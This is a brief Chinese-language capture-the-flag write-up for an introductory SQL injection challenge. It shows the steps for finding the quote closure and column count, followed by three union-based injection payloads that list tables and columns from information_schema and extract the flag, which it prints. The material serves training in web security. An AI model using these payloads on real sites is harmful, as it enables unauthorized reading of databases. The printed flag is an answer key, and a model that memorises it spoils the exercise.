[第一章 web入门]SQL注入-1
- 使用1’ and 1=2 --+测试出闭合符为 ’
- 使用1’ order by 3 --+,得出字段数为3
payload
id=-1'union select 1,(select(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())),3 --+
- 得出fl4g,notes
id=-1'union select 1,(select(group_concat(column_name))from(infoRmation_schema.columns)where(table_schema)like(database())AND(table_name)like('fl4g')),3 --+
- fllllag
id=-1'union select 1,(select(group_concat(fllllag))from(fl4g)),3 --+
- n1book{union_select_is_so_cool}
